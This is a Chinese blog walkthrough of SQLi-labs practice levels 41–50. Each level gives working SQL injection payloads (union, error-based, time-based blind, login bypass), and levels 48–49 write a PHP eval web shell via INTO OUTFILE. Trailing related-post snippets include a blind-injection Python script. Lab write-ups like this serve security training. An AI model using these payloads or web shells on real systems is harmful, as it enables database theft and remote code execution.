SQLi-labs靶场(41-50)过关超详细0基础

最新推荐文章于 2025-05-27 16:03:13 发布
原创 最新推荐文章于 2025-05-27 16:03:13 发布 · 1k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #oracle #sql #web安全

第四十一关

与前面几关一致存在联合查询,或者堆叠注入

这一关不需要闭合

?id=-1 union select 1,2,3--+

?id=-1 union select 1,2,database()--+

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=-1 union select 1,2,group_concat(username,password) from users--+

过关

第四十二关

熟悉的登录界面,但是这次下面的忘记密码和创建账号的选项都无法使用

方法一:万能密码

直接在密码处输入

1'or '1'='1

方法二:

在密码处输入1'后,发现存在报错信息

可以尝试报错注入

1' or updatexml(1,concat(0x7e,database(),0x7e),1)

爆库

1' or  updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

爆表

1' or  updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_name='users'),110,31),0x7e),1)--+

爆列

1' or  updatexml(1,concat(0x7e,mid((select group_concat(username,password) from users),1,31),0x7e),1)--+

爆字段

获取到了信息

过关

第四十三关

在密码处输入1',得到以下报错

判断闭合位1')

报错注入,与上题一样

1')or updatexml(1,concat(0x7e,database(),0x7e),1)--+

爆库

1')or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

爆表

1')or updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_name='users'),120,31),0x7e),1)--+

爆列

1')or updatexml(1,concat(0x7e,mid((select group_concat(username,password) from users),1,31),0x7e),1)--+

爆字段

获取全部字段后

过关

第四十四关

这一关注入没有报错信息,无法使用报错注入了

先使用万能密码

万能密码还是能用

再尝试使用盲注

经过尝试,需要输入正确的账号密码才能进行注入

Dumb' and if (length(database()) = 8 ,sleep(4),1)--+

确定数据库长度

Dumb' and if (substr(database(),1,1) = 's' ,sleep(4),1)--+ 

爆处数据库第一位是s,依次推出security

Dumb' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=6,sleep(3),0) --+

确定数据库第一个表的字段长度

Dumb'and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))=117,sleep(3),1)--+

依次找到users

Dumb'and if(length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7,sleep(3),1)--+

确定users下第一个列字段长度为7

Dumb'and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=117,sleep(3),1)--+

第一个列第一个字符是u

依次推出全部的列

Dumb'and if(length(substr((select username from users limit 0,1),1))=4,sleep(3),1)--+

确定username下第一字段有4个字符

Dumb'and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(3),1)--+

确定username第一个字段第一个字符是D

依次推出全部的账号密码信息

过关

第四十五关

这题与四十四题一样,但是')闭合

Dumb') and if(length(database())=8,sleep(2),0)--+

确定数据库字符长度

Dumb') and if(substr(database(),1,1)='s',sleep(2),0)--+

确定数据库名第一个字符是s,依次推处security

Dumb') and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=6,sleep(2),0)--+

确定数据库第一个表字符长度

Dumb') and if(ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 3,1),1,1))=117,sleep(2),0)--+

依次找到users

Dumb') and if(length(substr((select column_name from information_schema.columns where table_name='users'limit 0,1),1))=7,sleep(2),0)--+

确定users下第一个列的字段长度为7

Dumb') and if(ascii(substr((select column_name from information_schema.columns where table_name='users'limit 0,1),1))=117,sleep(2),0)--+

确定users下第一个列的第一个字符是u

依次推出全部的列名

Dumb') and if(length(substr((select username from users limit 0,1),1))=4,sleep(2),0)--+

确定username下第一个字段有4个字符

Dumb') and if(ascii(substr((select username from users limit 0,1),1))=68,sleep(2),0)--+

第一个字符是D

依次推出全部的账号密码信息

过关

第四十六关

提示我们使用数字形式输入sort

代码中使用的ORDER BY ,后面不能使用union select

?sort=1    不用闭合


?sort=1 asc  升序

?sort=1 desc  倒序

?sort=1

存在报错信息,可以使用报错注入

?sort=1 and updatexml(1,concat(0x7e,database(),0x7e),1)--+

爆库

?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

爆表

?sort=1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users'limit 12,1),0x7e),1)--+

爆列

?sort=1 and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1)--+

爆字段

依次获取全部的账号密码信息,过关

第四十七关

?sort=1'--+

这关与46一样,但是单引号闭合

?sort=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

#爆库

?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

#爆表

?sort=1' and updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_name='users'),120,31),0x7e),1)--+

#爆列

?sort=1' and updatexml(1,concat(0x7e,mid((select group_concat(username,password) from users),1,31),0x7e),1)--+

#爆字段

依次获取全部的账号密码信息

过关

第四十八关

?sort=1"

这一关关闭了报错信息

不能使用报错注入

可以尝试注入后门

http://sqli-labs:8888/Less-2/?id=-1 union select 1,@@basedir,@@datadir

首先到第二关获取相关路径

?sort=1 into outfile "C:\\phpstudy_pro\\WWW\\sqli-labs\\Less-48\\1.php" lines terminated by '<?php phpinfo();?>'

先尝试phpinfo看看能否上传成功

?sort=1 into outfile "C:\\phpstudy_pro\\WWW\\sqli-labs\\Less-48\\111.php" lines terminated by '<?php @eval($_POST[admin]);?>'

上传后门

启动蚁剑

连接成功

过关

第四十九关

与48关一样,但是单引号闭合

?sort=1' into outfile "C:\\phpstudy_pro\\WWW\\sqli-labs\\Less-49\\1.php" lines terminated by '<?php @eval($_POST[admin]);?>'--+

注入后门

连接蚁剑

过关

第五十关

?sort=1'

无闭合,且存在报错信息,可以使用报错注入

?sort=1 and updatexml(1,concat(0x7e,database(),0x7e),1)

爆库

?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)

爆表

?sort=1 and updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_name='users'),120,31),0x7e),1)

爆列

?sort=1 and updatexml(1,concat(0x7e,mid((select group_concat(username,password) from users),1,31),0x7e),1)

爆字段

获取全部的账号密码信息

过关

括弧

这关使用了mysql_multi_query函数,可以使用堆叠注入

SQL-Labs靶场“46-50教程
钟言的博客
02-24 1万+
本篇为SQL-Labs靶场的第4650教程,详细内容包含了:四十六 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 四十七 ORDER BY单引号报错注入 1、源码分析 2、报错注入 3、时间盲注 三、四十八 ODRER BY数字型盲注 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 四、四十九 ORDER BY单引号盲注1、源码分析 2、时间盲注 五、五十 ORDER BY数字型堆叠注等
sqli-labs 41——65攻略
weixin_45880717的博客
02-08 1012
Less-41 基于错误的POST型单引号字符型注入 与之前讲的Less-40的区别: sql="SELECT∗FROMusersWHEREid=sql="SELECT * FROM users WHERE id=sql="SELECT∗FROMusersWHEREid=id LIMIT 0,1"; 当然,和Less-40一样,都是盲注,不会显示错误信息,不过对我们没差,...
sql-labs 41-65
m0_46143427的博客
02-15 416
Less-41还是堆叠注入,而且还是数字型闭合。可以照搬39代码,但是与39不同的是,这没有报错的显示位。 查数据 /?id=1&id=0 union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+...
sql-labs 靶场41-50文字解析
最新发布
canyiguichen的博客
05-27 278
那么尝试在密码框里输入' and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -得到报错回显。我们使用布尔盲注,发现在使用sort=2' and 1=0-- -的时候还是没有出现异常。这样正确的字符能得到一个个人页面,错误的则是得到一个滚蛋吧傻逼黑客的页面。先判断闭合符,在判断过程中发现没有报错回显,而且看起来没有联合查询的可能。在密码框直接输入' or 1=1-- -能进行登录。发现在密码框那里输入' or 1=1-- -能进入。
sqli-labs41-
m0_73771249的博客
08-29 1583
整数闭合,共有3列。
sqli-labs靶场攻略——(41-60)
A2893992091的博客
08-28 851
抓包,查库和上一流程差不多,只是此采用布尔盲注。查得第一个字符为s,其余字符分别为ecurity。闭合方式为’),具体操作流程和四十四一样。抓包,使用堆叠注入输入新的用户名(没啥用)判断闭合方式为’)--+5.联合注入,爆数据。布尔盲注,查第四张表。闭合方式为‘)--+
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1893
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场(1-20
2301_77977773的博客
07-03 1126
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。
SQLi-Labs靶场笔记(1~21
trdtyvu的博客
07-06 3150
SQLi-Labs是一个专注于SQL注入的在线靶场,通过模拟真实的Web应用环境,帮助安全爱好者提高SQL注入的防范和应对能力。它一共有65个卡,其中卡的类型有但不限于联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过……可以看出,涵盖的范围还是很广的,对于我们初学注入的人来说很友好。首页可以选择卡。
sqli.labs靶场41-53
喜欢创作各种技术类文章,希望可以帮到你
02-04 1118
可以使用布尔盲注POC:123')+or+substr(database(),1,1)='a'--+可以用布尔盲注,POC:123'+or+lenth(database())=1--+这login_password是单引号闭合,可用布尔盲注。POC:111')--+,有报错信息,可以用报错注入。应该是报错了,一共三个字段,不显示错误可以用时间盲注。和48差不多,也是时间盲注,需要单引号闭合。有报错信息,还得报错注入,单引号闭合。没有报错信息,得用盲注,时间盲注。单引号闭合,没有报错,还得是盲注。
SQLi-LABS攻略【41-45】
qq_65852138的博客
08-28 293
SQLi-LABS攻略【41-45】
sqli-labs靶场攻略(41-60)
kknifek的博客
08-28 1025
第四十一 联合查询爆出数据库 但这考察的时堆叠注入 ,我们给他注入一条数据 输入id=50即可查到我们注入的数据 第四十二 看页面似曾相识,上次我们是用注册新用户然后对其他账户进行登录从而造成注入,但这次不能注册新用户了 存在堆叠注入函数,所以我们可以在密码哪里使用堆叠注入。向数据库里面插入密码账号,这样我们再来使用其进行登录就很简单了。 login_user=1&login_password=1';insert into users(id,user
Sqli-labs Less38-45 堆叠注入
kevinhanser
08-10 775
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 38: GET- Stacked Query Injection - String 源代码 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 测试 http://10.10.10.137/sqli-labs/Less-38/?id=...
sqli-labs(41-65)学习记录
weixin_60567444的博客
05-12 980
源码:联合注入?
sqli-labs靶场实战-Basic Challenges通攻略(一)
m0_66808441的博客
02-26 1746
step 1 --- 进入靶场,在URL后and跟上逻辑判断,and全真则真、有假则假,但逻辑判断的真假并未影响回显内容,所以判断不是数字型注 入。step 3 --- 使用注释符:--+,将后面内容注释掉,使得id='1'正常回显。(正常注释符为:--空格,但在url中往往被写成--+)step 5 --- 确定回显点,即使用union联合查询,找出回显出的内容属于哪2个字段。出现报错情况,--+注释后面内容,若恢复正常,则为闭合方式;step 4 --- 判断字段数,使用 order by。
sqli-labs (less-41)
kukudeshuo的博客
03-14 375
sqli-labs (less-41) 进入41,输入id=1 http://127.0.0.1/sql1/Less-41/?id=1' #无错误回显 因为没有任何错误显示,只能一个一个去猜 http://127.0.0.1/sql1/Less-41/?id=1--+ #回显正常 http://127.0.0.1/sql1/Less-41/?id=1'--+ #回显错误 http://127.0.0.1/sql1/Less-41/?id=1"--+ #回显错误 这里我们不使用union注入,直接
sqlilabs靶场第11
02-25
### SQLi Labs Level 11 解决方案 对于SQL注入实验室(SQLi Labs)中的第十一,目标是在存在漏洞的应用程序中利用基于布尔盲注的SQL注入来获取数据库版本信息。 应用程序源码显示输入框用于查询用户的ID。当提交特定参数`id=1' and if(ascii(substring(@@version,1,1))>0,sleep(5),0)-- `时,如果条件成立,则服务器会延迟响应五秒[^1]。这表明可以通过调整ASCII值比较以及改变`substring`函数内的位置索引来逐位推断出MySQL版本字符串的内容。 为了实现自动化攻击过程并提高效率,可以编写Python脚本来执行时间延迟测试: ```python import requests import string url = "http://localhost/sqli/Less-11/?id=1" true_condition_delay = 5 # 延迟的时间长度 database_version_length = 5 # 数据库版本号预期的最大字符数 charset = string.printable[:94] def check(payload): start_time = time.time() response = requests.get(url + payload) elapsed_time = time.time() - start_time return elapsed_time >= true_condition_delay for position in range(1,database_version_length+1): for char in charset: hex_value = hex(ord(char))[2:] injection_string = f"' AND IF(Ascii(Substr(@@version,{position},1))={ord(char)},Sleep({true_condition_delay}),0)%23" if check(injection_string): print(f"Character found: {char}") break ``` 此代码片段通过遍历可打印字符集尝试每一位可能的字符直到找到匹配项为止,并输出构成最终版本号的部分字符。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值